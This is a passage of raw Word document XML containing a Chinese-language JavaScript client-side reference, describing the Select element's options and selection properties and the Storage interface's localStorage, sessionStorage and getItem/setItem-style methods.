        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签和结束的＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签之间的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前脚本语言的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型。默认为</w:t>
      </w:r>
      <w:r>
        <w:t>"text/javascript"</w:t>
      </w:r>
      <w:r>
        <w:t>，常规</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>脚本可以不用设置这个属性（或对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性）。如果将这个属性设置为一个自定义的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型，可在对应的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中嵌入其他脚本使用的任意文本数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="868" w:name="Select"/>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:bookmarkEnd w:id="868"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图形化的选择列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签，用于向用户显示一个图形化的选择列表。如果存在对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML multiple</w:t>
      </w:r>
      <w:r>
        <w:t>属性，则用户可</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>以从列表中选择任意个选项。如果这个属性不存在，则用户只能选择一个选项，同时选项将有类似单选按钮的行为</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>选中一个选项的同时将取消之前选中的任意选项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素中的选项可以以两种不同的方式显示。如果</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>属性有值并且值大于</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，或者指定了</w:t>
      </w:r>
      <w:r>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:t>属性，则选项将在浏览器窗口中显示为一个</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>行的列表框。如果</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>比选项的数目小，则列表框将包含一个滚动条。另一方面，如果</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>并且没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:t>属性，则当前选中的选项将显示在单独的一行中，其他选项的列表可通过一个下拉菜单访问。第一种显示样式将选项显示得更加清晰，但需要占用浏览器窗口中的更多空间。第二种显示样式需要的空间最少，但不会显式显示其他可选选项。当设置了</w:t>
      </w:r>
      <w:r>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:t>属</w:t>
      </w:r>
      <w:r>
        <w:t>性时，</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>；否则</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>的默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>options[]</w:t>
      </w:r>
      <w:r>
        <w:t>属性最值得关注。它是一个由＜</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>）组成的类数组对象，这些＜</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>＞描述</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素显示的选项。由于历史原因，这个类数组对象在添加及删除＜</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素时有一些与众不同的行为。细节可参见</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素来说，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>selectedIndex</w:t>
      </w:r>
      <w:r>
        <w:t>属性来判断选中了哪个选项。不过，如果允许复选的话，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个属性</w:t>
      </w:r>
      <w:r>
        <w:t>就只能告诉你第一个选中的选项。要判断选中的选项的完整集合，必须遍历</w:t>
      </w:r>
      <w:r>
        <w:t>options[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组并检查每一个</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>selected</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</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除了这儿列出的属性外，</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素也定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，另外还通过下面的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性映射了对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
      <w:r>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>required</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:t>集合中元素的数目。</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>对象本身就是一个类数组对象，对一个</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>以及一个数字</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>来说</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>s[n]</w:t>
      </w:r>
      <w:r>
        <w:t>等同于</w:t>
      </w:r>
      <w:r>
        <w:t>s.options[n]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLOptionsCollection options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素包含的</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素组成的类数组对象。关于这个集合的历史原因造成的特殊行为，可参见</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long selectedIndex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>选中的选项在</w:t>
      </w:r>
      <w:r>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:t>数组中的位置。如果没有选项选中，则这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。如果选中多个选项，这个属性返回第一个选中的选项的索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置这个属性的值，将导致指定的选项选中，同时所有其他选项取消选中，即使这个</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>对象指定了</w:t>
      </w:r>
      <w:r>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在处理列表框选项（当</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）时，可以通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>selectedIndex</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>来取消选中所有选项。注意，用这种方式改变选择不会触发</w:t>
      </w:r>
      <w:r>
        <w:t>onchange()</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLCollection selectedOptions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由选中的</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素组成的只读的类数组对象。这是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>新定义的属性，在写作本书的时候，还没有广泛支持。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这儿列出的方法都委托给</w:t>
      </w:r>
      <w:r>
        <w:t>op</w:t>
      </w:r>
      <w:r>
        <w:t>tions</w:t>
      </w:r>
      <w:r>
        <w:t>属性的同名方法，细节可参见</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>。除了这些方法外，</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素也实现了</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void add(Element element,[any before])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法和</w:t>
      </w:r>
      <w:r>
        <w:t>options.add()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，用于添加一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>any item(unsigned long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法和</w:t>
      </w:r>
      <w:r>
        <w:t>options.item()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素。在用户直接检索</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>对象时也会调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> namedItem(string name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法和</w:t>
      </w:r>
      <w:r>
        <w:t>options.namedItem()</w:t>
      </w:r>
      <w:r>
        <w:t>一样。参见</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void remove(long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法和</w:t>
      </w:r>
      <w:r>
        <w:t>options.remove()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，用于移除一个</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素。参见</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="869" w:name="Storage"/>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="869"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>客户端存储的</w:t>
      </w:r>
      <w:r>
        <w:t>name/value</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>属性都是</w:t>
      </w:r>
      <w:r>
        <w:t>Session</w:t>
      </w:r>
      <w:r>
        <w:t>对象，表示持久的客户端关联数组，这些数组将</w:t>
      </w:r>
      <w:r>
        <w:t>字符串键与值对应。理论上，</w:t>
      </w:r>
      <w:r>
        <w:t>Session</w:t>
      </w:r>
      <w:r>
        <w:t>对象可以存储任意可用结构性复制算法（参见</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）复制的值。不过，在写作本书的时候，各浏览器还只支持字符串值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法允许添加新的键</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对、移除键</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对，以及查询指定的键对应的值。不过，不需要显式地调用这些方法：可以使用数组检索或</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符来代替，还能将</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>当做普通</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象来处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果改变了某个</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象的内容，有权限访问同一个存储器（因为它们正在显示来自同一个源的文档）的任何其他</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>都将通过一个</w:t>
      </w:r>
      <w:r>
        <w:t>StorageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>事件通知这个改变。</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已存储的键</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对的数目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void clear()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>移除所有已存储的健</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>any getItem(string key)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回与</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>对应的值。（在写作本书时各大浏览器的实现中，返回值总是为一个字符串。）当为了检索名为</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>的属性而检索</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象时</w:t>
      </w:r>
      <w:r>
        <w:t>，会隐式调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string key(unsigned long n)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回当前</w:t>
      </w:r>
      <w:r>
        <w:t>Stroage</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个键，如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>大于或等于</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，添加或移除键</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对时键的顺序可能会改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void removeItem(string key)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从当前</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象中移除键</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>以及它对应的值。使用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作删除当前</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象的名为</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>的属性时，将会隐式调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setItem(string key,any value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>添加指定的</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>到当前</w:t>
      </w:r>
      <w:r>
